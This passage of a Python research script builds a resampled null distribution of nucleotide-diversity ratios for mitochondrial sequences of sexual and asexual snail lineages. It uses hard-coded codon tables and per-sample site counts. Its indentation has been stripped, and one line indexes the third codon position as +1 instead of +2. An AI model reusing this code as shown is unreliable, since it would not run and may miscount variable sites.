'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
synSites = {">$Duluth":2591.52083333, ">$Heron2":2598, ">$McGregor":2599, ">$Waik36":2586.91666667, ">$WalesC":2584.91666667, ">$clone_1":2598, ">$AC51":2598.33333333, ">$Heron_mitochondrion":2599, ">$clone_7":2592.85416667, ">$Waik37":2586.58333333, ">$Gunn":2597.66666667, ">$DenmarkA":2593.125, ">$Waik372":2589.25, ">$Tarawera":2586.58333333, ">$Poerua_triploid":2597, ">$Kaniere_triploid":2586.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2593.79166667, ">$Brunner_2_4n":2593.60416674, ">$Brunner_6_3n":2592.9583334, ">$Grasmere_1_4n":2628.66666703, ">$Grasmere_6_3n":2599.62500001, ">$Poerua_72_4n":2605.47916675, ">$Rotoiti_1_4n":2594.35416672, ">$*Kaniere_1_2n":2598.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2595, ">$*Yellow_Contig_56":2592.33333333, ">$*Alexsex":2592.33333333, ">$*AlexMap":2592.33333333, ">$*Lady":2598.66666667, ">$*Ianthe":2597, ">$*Rotoroa_1_2n":2598.58333338}
C1Sites = {">$Duluth":6323.85416667, ">$Heron2":6320.33333333, ">$McGregor":6319, ">$Waik36":6330.25, ">$WalesC":6333.25, ">$clone_1":6319.66666667, ">$AC51":6318.66666667, ">$Heron_mitochondrion":6319.33333333, ">$clone_7":6322.52083333, ">$Waik37":6327.25, ">$Gunn":6324.33333333, ">$DenmarkA":6322.45833333, ">$Waik372":6330.58333333, ">$Tarawera":6329.25, ">$Poerua_triploid":6321.66666667, ">$Kaniere_triploid":6330.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":6320.125, ">$Brunner_2_4n":6259.27083326, ">$Brunner_6_3n":6262.95833327, ">$Grasmere_1_4n":5990.99999963, ">$Grasmere_6_3n":6307.62499999, ">$Poerua_72_4n":6232.81249992, ">$Rotoiti_1_4n":6264.68749995, ">$*Kaniere_1_2n":6320.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":6321, ">$*Yellow_Contig_56":6326.33333333, ">$*Alexsex":6326.33333333, ">$*AlexMap":6326.33333333, ">$*Lady":6318, ">$*Ianthe":6321.33333333, ">$*Rotoroa_1_2n":6271.58333329}
R1Sites = {">$Duluth":2298.625, ">$Heron2":2295.66666667, ">$McGregor":2296, ">$Waik36":2296.83333333, ">$WalesC":2295.83333333, ">$clone_1":2296.33333333, ">$AC51":2297, ">$Heron_mitochondrion":2295.66666667, ">$clone_7":2298.625, ">$Waik37":2300.16666667, ">$Gunn":2292, ">$DenmarkA":2298.41666667, ">$Waik372":2294.16666667, ">$Tarawera":2298.16666667, ">$Poerua_triploid":2295.33333333, ">$Kaniere_triploid":2296.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2300.08333333, ">$Brunner_2_4n":2361.125, ">$Brunner_6_3n":2358.08333333, ">$Grasmere_1_4n":2594.33333333, ">$Grasmere_6_3n":2306.75, ">$Poerua_72_4n":2375.70833333, ">$Rotoiti_1_4n":2354.95833333, ">$*Kaniere_1_2n":2295.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2298, ">$*Yellow_Contig_56":2295.33333333, ">$*Alexsex":2295.33333333, ">$*AlexMap":2295.33333333, ">$*Lady":2297.33333333, ">$*Ianthe":2295.66666667, ">$*Rotoroa_1_2n":2343.83333333}
C2Sites = {">$Duluth":5093.47916667, ">$Heron2":5090.33333333, ">$McGregor":5089.66666667, ">$Waik36":5100.75, ">$WalesC":5101.75, ">$clone_1":5091.33333333, ">$AC51":5089.33333333, ">$Heron_mitochondrion":5088.66666667, ">$clone_7":5092.14583333, ">$Waik37":5096.75, ">$Gunn":5090.33333333, ">$DenmarkA":5091.875, ">$Waik372":5097.41666667, ">$Tarawera":5097.08333333, ">$Poerua_triploid":5092, ">$Kaniere_triploid":5096.75, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5091.20833333, ">$Brunner_2_4n":5082.39583326, ">$Brunner_6_3n":5076.37499994, ">$Grasmere_1_4n":4999.33333297, ">$Grasmere_6_3n":5084.70833332, ">$Poerua_72_4n":5059.52083325, ">$Rotoiti_1_4n":5085.97916662, ">$*Kaniere_1_2n":5090, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5095.33333333, ">$*Yellow_Contig_56":5097.33333333, ">$*Alexsex":5097.33333333, ">$*AlexMap":5097.33333333, ">$*Lady":5089, ">$*Ianthe":5093, ">$*Rotoroa_1_2n":5078.41666662}
R2Sites = {">$Duluth":3529, ">$Heron2":3525.66666667, ">$McGregor":3525.33333333, ">$Waik36":3526.33333333, ">$WalesC":3527.33333333, ">$clone_1":3524.66666667, ">$AC51":3526.33333333, ">$Heron_mitochondrion":3526.33333333, ">$clone_7":3529, ">$Waik37":3530.66666667, ">$Gunn":3526, ">$DenmarkA":3529, ">$Waik372":3527.33333333, ">$Tarawera":3530.33333333, ">$Poerua_triploid":3525, ">$Kaniere_triploid":3530.66666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3529, ">$Brunner_2_4n":3538, ">$Brunner_6_3n":3544.66666667, ">$Grasmere_1_4n":3586, ">$Grasmere_6_3n":3529.66666667, ">$Poerua_72_4n":3549, ">$Rotoiti_1_4n":3533.66666667, ">$*Kaniere_1_2n":3525.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3523.66666667, ">$*Yellow_Contig_56":3524.33333333, ">$*Alexsex":3524.33333333, ">$*AlexMap":3524.33333333, ">$*Lady":3526.33333333, ">$*Ianthe":3524, ">$*Rotoroa_1_2n":3537}
C3Sites = {">$Duluth":2949.125, ">$Heron2":2945, ">$McGregor":2945, ">$Waik36":2947.16666667, ">$WalesC":2950.83333333, ">$clone_1":2944.66666667, ">$AC51":2945, ">$Heron_mitochondrion":2944.66666667, ">$clone_7":2949.79166667, ">$Waik37":2950.5, ">$Gunn":2944, ">$DenmarkA":2949.75, ">$Waik372":2952.83333333, ">$Tarawera":2950.5, ">$Poerua_triploid":2945.66666667, ">$Kaniere_triploid":2950.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2948.75, ">$Brunner_2_4n":2917.29166659, ">$Brunner_6_3n":2925.4166666, ">$Grasmere_1_4n":2832.33333297, ">$Grasmere_6_3n":2941.74999999, ">$Poerua_72_4n":2926.20833325, ">$Rotoiti_1_4n":2932.12499995, ">$*Kaniere_1_2n":2945.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2945.33333333, ">$*Yellow_Contig_56":2946.66666667, ">$*Alexsex":2946.66666667, ">$*AlexMap":2946.66666667, ">$*Lady":2947.33333333, ">$*Ianthe":2945.33333333, ">$*Rotoroa_1_2n":2928.16666662}
R3Sites = {">$Duluth":5673.35416667, ">$Heron2":5671, ">$McGregor":5670, ">$Waik36":5679.91666667, ">$WalesC":5678.25, ">$clone_1":5671.33333333, ">$AC51":5670.66666667, ">$Heron_mitochondrion":5670.33333333, ">$clone_7":5671.35416667, ">$Waik37":5676.91666667, ">$Gunn":5672.33333333, ">$DenmarkA":5671.125, ">$Waik372":5671.91666667, ">$Tarawera":5676.91666667, ">$Poerua_triploid":5671.33333333, ">$Kaniere_triploid":5676.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5671.45833333, ">$Brunner_2_4n":5703.10416667, ">$Brunner_6_3n":5695.625, ">$Grasmere_1_4n":5753, ">$Grasmere_6_3n":5672.625, ">$Poerua_72_4n":5682.3125, ">$Rotoiti_1_4n":5687.52083333, ">$*Kaniere_1_2n":5670, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5673.66666667, ">$*Yellow_Contig_56":5675, ">$*Alexsex":5675, ">$*AlexMap":5675, ">$*Lady":5668, ">$*Ianthe":5671.66666667, ">$*Rotoroa_1_2n":5687.25}
C4Sites = {">$Duluth":3422.02083333, ">$Heron2":3419.66666667, ">$McGregor":3420, ">$Waik36":3420.25, ">$WalesC":3423.25, ">$clone_1":3419.33333333, ">$AC51":3419, ">$Heron_mitochondrion":3419, ">$clone_7":3422.6875, ">$Waik37":3424.58333333, ">$Gunn":3420, ">$DenmarkA":3422.45833333, ">$Waik372":3428.25, ">$Tarawera":3424.91666667, ">$Poerua_triploid":3421, ">$Kaniere_triploid":3423.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3421.79166667, ">$Brunner_2_4n":3405.10416659, ">$Brunner_6_3n":3421.95833327, ">$Grasmere_1_4n":3382.99999963, ">$Grasmere_6_3n":3416.95833332, ">$Poerua_72_4n":3422.97916658, ">$Rotoiti_1_4n":3422.85416662, ">$*Kaniere_1_2n":3420.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3420, ">$*Yellow_Contig_56":3420.66666667, ">$*Alexsex":3420.66666667, ">$*AlexMap":3420.66666667, ">$*Lady":3423, ">$*Ianthe":3419.33333333, ">$*Rotoroa_1_2n":3414.91666662}
R4Sites = {">$Duluth":5200.45833333, ">$Heron2":5196.33333333, ">$McGregor":5195, ">$Waik36":5206.83333333, ">$WalesC":5205.83333333, ">$clone_1":5196.66666667, ">$AC51":5196.66666667, ">$Heron_mitochondrion":5196, ">$clone_7":5198.45833333, ">$Waik37":5202.83333333, ">$Gunn":5196.33333333, ">$DenmarkA":5198.41666667, ">$Waik372":5196.5, ">$Tarawera":5202.5, ">$Poerua_triploid":5196, ">$Kaniere_triploid":5203.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5198.41666667, ">$Brunner_2_4n":5215.29166667, ">$Brunner_6_3n":5199.08333333, ">$Grasmere_1_4n":5202.33333333, ">$Grasmere_6_3n":5197.41666667, ">$Poerua_72_4n":5185.54166667, ">$Rotoiti_1_4n":5196.79166667, ">$*Kaniere_1_2n":5195.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5199, ">$*Yellow_Contig_56":5201, ">$*Alexsex":5201, ">$*AlexMap":5201, ">$*Lady":5192.33333333, ">$*Ianthe":5197.66666667, ">$*Rotoroa_1_2n":5200.5}
C5Sites = {">$Duluth":4384.85416667, ">$Heron2":4382.33333333, ">$McGregor":4382, ">$Waik36":4383.58333333, ">$WalesC":4385.58333333, ">$clone_1":4382.33333333, ">$AC51":4382, ">$Heron_mitochondrion":4382.33333333, ">$clone_7":4385.1875, ">$Waik37":4385.58333333, ">$Gunn":4382.66666667, ">$DenmarkA":4385.125, ">$Waik372":4390.58333333, ">$Tarawera":4385.58333333, ">$Poerua_triploid":4383.33333333, ">$Kaniere_triploid":4386.25, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4383.79166667, ">$Brunner_2_4n":4338.9375, ">$Brunner_6_3n":4354.95833333, ">$Grasmere_1_4n":4238, ">$Grasmere_6_3n":4375.95833333, ">$Poerua_72_4n":4354.14583333, ">$Rotoiti_1_4n":4363.35416667, ">$*Kaniere_1_2n":4383.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4384, ">$*Yellow_Contig_56":4381.66666667, ">$*Alexsex":4381.66666667, ">$*AlexMap":4381.66666667, ">$*Lady":4385.33333333, ">$*Ianthe":4384.66666667, ">$*Rotoroa_1_2n":4354.91666667}
R5Sites = {">$Duluth":4237.625, ">$Heron2":4233.66666667, ">$McGregor":4233, ">$Waik36":4243.5, ">$WalesC":4243.5, ">$clone_1":4233.66666667, ">$AC51":4233.66666667, ">$Heron_mitochondrion":4232.66666667, ">$clone_7":4235.95833333, ">$Waik37":4241.83333333, ">$Gunn":4233.66666667, ">$DenmarkA":4235.75, ">$Waik372":4234.16666667, ">$Tarawera":4241.83333333, ">$Poerua_triploid":4233.66666667, ">$Kaniere_triploid":4241.16666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4236.41666667, ">$Brunner_2_4n":4281.45833326, ">$Brunner_6_3n":4266.08333327, ">$Grasmere_1_4n":4347.33333297, ">$Grasmere_6_3n":4238.41666665, ">$Poerua_72_4n":4254.37499992, ">$Rotoiti_1_4n":4256.29166662, ">$*Kaniere_1_2n":4232.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4235, ">$*Yellow_Contig_56":4240, ">$*Alexsex":4240, ">$*AlexMap":4240, ">$*Lady":4230, ">$*Ianthe":4232.33333333, ">$*Rotoroa_1_2n":4260.49999996}
C6Sites = {">$Duluth":4128.5625, ">$Heron2":4124.66666667, ">$McGregor":4124.33333333, ">$Waik36":4130.08333333, ">$WalesC":4129.75, ">$clone_1":4125.66666667, ">$AC51":4124.66666667, ">$Heron_mitochondrion":4125, ">$clone_7":4126.89583333, ">$Waik37":4123.41666667, ">$Gunn":4126.33333333, ">$DenmarkA":4127.04166667, ">$Waik372":4126.08333333, ">$Tarawera":4124.08333333, ">$Poerua_triploid":4126, ">$Kaniere_triploid":4125.75, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4126.04166667, ">$Brunner_2_4n":4078.47916674, ">$Brunner_6_3n":4075.2083334, ">$Grasmere_1_4n":3848.3333337, ">$Grasmere_6_3n":4112.54166668, ">$Poerua_72_4n":4050.43750008, ">$Rotoiti_1_4n":4084.39583338, ">$*Kaniere_1_2n":4126.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4125, ">$*Yellow_Contig_56":4127.33333333, ">$*Alexsex":4127.33333333, ">$*AlexMap":4127.33333333, ">$*Lady":4121, ">$*Ianthe":4123.66666667, ">$*Rotoroa_1_2n":4085.08333338}
R6Sites = {">$Duluth":4493.91666667, ">$Heron2":4491.33333333, ">$McGregor":4490.66666667, ">$Waik36":4497, ">$WalesC":4499.33333333, ">$clone_1":4490.33333333, ">$AC51":4491, ">$Heron_mitochondrion":4490, ">$clone_7":4494.25, ">$Waik37":4504, ">$Gunn":4490, ">$DenmarkA":4493.83333333, ">$Waik372":4498.66666667, ">$Tarawera":4503.33333333, ">$Poerua_triploid":4491, ">$Kaniere_triploid":4501.66666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4494.16666667, ">$Brunner_2_4n":4541.91666674, ">$Brunner_6_3n":4545.8333334, ">$Grasmere_1_4n":4737.00000037, ">$Grasmere_6_3n":4501.83333335, ">$Poerua_72_4n":4558.08333342, ">$Rotoiti_1_4n":4535.25000005, ">$*Kaniere_1_2n":4489.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4494, ">$*Yellow_Contig_56":4494.33333333, ">$*Alexsex":4494.33333333, ">$*AlexMap":4494.33333333, ">$*Lady":4494.33333333, ">$*Ianthe":4493.33333333, ">$*Rotoroa_1_2n":4530.33333338}
C7Sites = {">$Duluth":3873.77083333, ">$Heron2":3870.66666667, ">$McGregor":3870, ">$Waik36":3879.91666667, ">$WalesC":3880.58333333, ">$clone_1":3871.66666667, ">$AC51":3870.66666667, ">$Heron_mitochondrion":3870.33333333, ">$clone_7":3872.10416667, ">$Waik37":3874.25, ">$Gunn":3872.33333333, ">$DenmarkA":3871.625, ">$Waik372":3875.91666667, ">$Tarawera":3874.58333333, ">$Poerua_triploid":3872.66666667, ">$Kaniere_triploid":3875.91666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3870.29166667, ">$Brunner_2_4n":3832.85416667, ">$Brunner_6_3n":3825.79166667, ">$Grasmere_1_4n":3635.33333333, ">$Grasmere_6_3n":3860.45833333, ">$Poerua_72_4n":3801.89583333, ">$Rotoiti_1_4n":3832.9375, ">$*Kaniere_1_2n":3871.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3873.66666667, ">$*Yellow_Contig_56":3877, ">$*Alexsex":3877, ">$*AlexMap":3877, ">$*Lady":3869, ">$*Ianthe":3872.33333333, ">$*Rotoroa_1_2n":3832.58333333}
R7Sites = {">$Duluth":4748.70833333, ">$Heron2":4745.33333333, ">$McGregor":4745, ">$Waik36":4747.16666667, ">$WalesC":4748.5, ">$clone_1":4744.33333333, ">$AC51":4745, ">$Heron_mitochondrion":4744.66666667, ">$clone_7":4749.04166667, ">$Waik37":4753.16666667, ">$Gunn":4744, ">$DenmarkA":4749.25, ">$Waik372":4748.83333333, ">$Tarawera":4752.83333333, ">$Poerua_triploid":4744.33333333, ">$Kaniere_triploid":4751.5, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4749.91666667, ">$Brunner_2_4n":4787.54166659, ">$Brunner_6_3n":4795.24999994, ">$Grasmere_1_4n":4949.99999963, ">$Grasmere_6_3n":4753.91666665, ">$Poerua_72_4n":4806.62499992, ">$Rotoiti_1_4n":4786.70833328, ">$*Kaniere_1_2n":4744, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4745.33333333, ">$*Yellow_Contig_56":4744.66666667, ">$*Alexsex":4744.66666667, ">$*AlexMap":4744.66666667, ">$*Lady":4746.33333333, ">$*Ianthe":4744.66666667, ">$*Rotoroa_1_2n":4782.83333329}
meanCSites = {">$Duluth":4310.80952381, ">$Heron2":4307.57142857143, ">$McGregor":4307.14285714286, ">$Waik36":4313.14285714286, ">$WalesC":4314.99999999857, ">$clone_1":4307.80952381, ">$AC51":4307.04761904857, ">$Heron_mitochondrion":4307.04761904714, ">$clone_7":4310.19047619, ">$Waik37":4311.76190476143, ">$Gunn":4308.57142857, ">$DenmarkA":4310.04761904714, ">$Waik372":4314.52380952286, ">$Tarawera":4312.28571428429, ">$Poerua_triploid":4308.90476190571, ">$Kaniere_triploid":4312.80952380857, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4308.85714285857, ">$Brunner_2_4n":4273.47619044429, ">$Brunner_6_3n":4277.52380949714, ">$Grasmere_1_4n":4132.47619031857, ">$Grasmere_6_3n":4299.99999999429, ">$Poerua_72_4n":4263.99999996286, ">$Rotoiti_1_4n":4283.76190474143, ">$*Kaniere_1_2n":4308.23809523714, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4309.19047619, ">$*Yellow_Contig_56":4311, ">$*Alexsex":4311, ">$*AlexMap":4311, ">$*Lady":4307.52380952286, ">$*Ianthe":4308.52380952286, ">$*Rotoroa_1_2n":4280.80952379}
meanRSites = {">$Duluth":4311.66964285714, ">$Heron2":4308.42857142857, ">$McGregor":4307.85714285714, ">$Waik36":4313.94047619, ">$WalesC":4314.08333333143, ">$clone_1":4308.19047619, ">$AC51":4308.61904762, ">$Heron_mitochondrion":4307.95238095286, ">$clone_7":4310.95535714286, ">$Waik37":4315.65476190571, ">$Gunn":4307.76190476143, ">$DenmarkA":4310.82738095286, ">$Waik372":4310.22619047714, ">$Tarawera":4315.13095238, ">$Poerua_triploid":4308.09523809429, ">$Kaniere_triploid":4314.60714285714, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4311.35119047714, ">$Brunner_2_4n":4346.91964284714, ">$Brunner_6_3n":4343.51785713429, ">$Grasmere_1_4n":4452.85714280429, ">$Grasmere_6_3n":4314.37499999857, ">$Poerua_72_4n":4344.52083332286, ">$Rotoiti_1_4n":4335.88392856429, ">$*Kaniere_1_2n":4307.42857142714, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4309.80952381, ">$*Yellow_Contig_56":4310.66666666571, ">$*Alexsex":4310.66666666571, ">$*AlexMap":4310.66666666571, ">$*Lady":4307.80952380714, ">$*Ianthe":4308.47619047714, ">$*Rotoroa_1_2n":4334.60714285143}
D1 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#πC/πS
D2 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#πR/πS
D3 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#thetaC/thetaS
D4 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#thetaR/thetaS
D5 = {'piS':[]} #πS
logfile = open('mt_nullDistribution_IantheAnalysis.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
else:
outList.append(seq)
seqNums = range(len(popList))
currPCT = 0
sexN = 6
asexN = 16
sexAn = aN(sexN)
asexAn = aN(asexN)
logfile.write('Calculating population genetic parameters:\n')
logfile.close()
while len(D1['mean']) < 10000:
newPCT = int(round(100*len(D1['mean'])/10000.0))
if newPCT > currPCT:
logfile = open('mt_nullDistribution_πS.log','a')
logfile.write('\t' + str(newPCT) + '% complete\n')
logfile.close()
currPCT = newPCT
sexList = []
asexList = []
while len(sexList) < sexN:
currNum = random.choice(seqNums)
if popList[currNum] not in sexList:
sexList.append(popList[currNum])
while len(asexList) < asexN:
currNum = random.choice(seqNums)
if popList[currNum] not in asexList and popList[currNum] not in sexList:
asexList.append(popList[currNum])
sexSynSites = 0.0
asexSynSites = 0.0
sexC1Sites = 0.0
sexC2Sites = 0.0
sexC3Sites = 0.0
sexC4Sites = 0.0
sexC5Sites = 0.0
sexC6Sites = 0.0
sexC7Sites = 0.0
sexMeanCSites = 0.0
sexR1Sites = 0.0
sexR2Sites = 0.0
sexR3Sites = 0.0
sexR4Sites = 0.0
sexR5Sites = 0.0
sexR6Sites = 0.0
sexR7Sites = 0.0
sexMeanRSites = 0.0
asexC1Sites = 0.0
asexC2Sites = 0.0
asexC3Sites = 0.0
asexC4Sites = 0.0
asexC5Sites = 0.0
asexC6Sites = 0.0
asexC7Sites = 0.0
asexMeanCSites = 0.0
asexR1Sites = 0.0
asexR2Sites = 0.0
asexR3Sites = 0.0
asexR4Sites = 0.0
asexR5Sites = 0.0
asexR6Sites = 0.0
asexR7Sites = 0.0
asexMeanRSites = 0.0
for sexual in sexList:
sexSynSites += synSites[sexual]
sexC1Sites += C1Sites[sexual]
sexC2Sites += C2Sites[sexual]
sexC3Sites += C3Sites[sexual]
sexC4Sites += C4Sites[sexual]
sexC5Sites += C5Sites[sexual]
sexC6Sites += C6Sites[sexual]
sexC7Sites += C7Sites[sexual]
sexMeanCSites += meanCSites[sexual]
sexR1Sites += R1Sites[sexual]
sexR2Sites += R2Sites[sexual]
sexR3Sites += R3Sites[sexual]
sexR4Sites += R4Sites[sexual]
sexR5Sites += R5Sites[sexual]
sexR6Sites += R6Sites[sexual]
sexR7Sites += R7Sites[sexual]
sexMeanRSites += meanRSites[sexual]
for asexual in asexList:
asexSynSites += synSites[asexual]
asexC1Sites += C1Sites[asexual]
asexC2Sites += C2Sites[asexual]
asexC3Sites += C3Sites[asexual]
asexC4Sites += C4Sites[asexual]
asexC5Sites += C5Sites[asexual]
asexC6Sites += C6Sites[asexual]
asexC7Sites += C7Sites[asexual]
asexMeanCSites += meanCSites[asexual]
asexR1Sites += R1Sites[asexual]
asexR2Sites += R2Sites[asexual]
asexR3Sites += R3Sites[asexual]
asexR4Sites += R4Sites[asexual]
asexR5Sites += R5Sites[asexual]
asexR6Sites += R6Sites[asexual]
asexR7Sites += R7Sites[asexual]
asexMeanRSites += meanRSites[asexual]
asexSynSites /= len(asexList)
asexC1Sites /= len(asexList)
asexC2Sites /= len(asexList)
asexC3Sites /= len(asexList)
asexC4Sites /= len(asexList)
asexC5Sites /= len(asexList)
asexC6Sites /= len(asexList)
asexC7Sites /= len(asexList)
asexMeanCSites /= len(asexList)
asexR1Sites /= len(asexList)
asexR2Sites /= len(asexList)
asexR3Sites /= len(asexList)
asexR4Sites /= len(asexList)
asexR5Sites /= len(asexList)
asexR6Sites /= len(asexList)
asexR7Sites /= len(asexList)
asexMeanRSites /= len(asexList)
sexSynSites /= len(sexList)
sexC1Sites /= len(sexList)
sexC2Sites /= len(sexList)
sexC3Sites /= len(sexList)
sexC4Sites /= len(sexList)
sexC5Sites /= len(sexList)
sexC6Sites /= len(sexList)
sexC7Sites /= len(sexList)
sexMeanCSites /= len(sexList)
sexR1Sites /= len(sexList)
sexR2Sites /= len(sexList)
sexR3Sites /= len(sexList)
sexR4Sites /= len(sexList)
sexR5Sites /= len(sexList)
sexR6Sites /= len(sexList)
sexR7Sites /= len(sexList)
sexMeanRSites /= len(sexList)
refSeq = seqDict[sexList[0]]
outSeq = seqDict[outList[0]]
outCodons = codonDict[outList[0]]
sex_sum2PQ_S = 0
sex_sum2PQ_N = 0
sex_sum2PQ_C1 = 0
sex_sum2PQ_C2 = 0
sex_sum2PQ_C3 = 0
sex_sum2PQ_C4 = 0
sex_sum2PQ_C5 = 0
sex_sum2PQ_C6 = 0
sex_sum2PQ_C7 = 0
sex_sum2PQ_R1 = 0
sex_sum2PQ_R2 = 0
sex_sum2PQ_R3 = 0
sex_sum2PQ_R4 = 0
sex_sum2PQ_R5 = 0
sex_sum2PQ_R6 = 0
sex_sum2PQ_R7 = 0
sex_sum2PQ_meanC = 0
sex_sum2PQ_meanR = 0
sex_synS = 0
sex_nsynS = 0
sex_con1S = 0
sex_con2S = 0
sex_con3S = 0
sex_con4S = 0
sex_con5S = 0
sex_con6S = 0
sex_con7S = 0
sex_meanConS = 0
sex_rad1S = 0
sex_rad2S = 0
sex_rad3S = 0
sex_rad4S = 0
sex_rad5S = 0
sex_rad6S = 0
sex_rad7S = 0
sex_meanRadS = 0
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in sexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
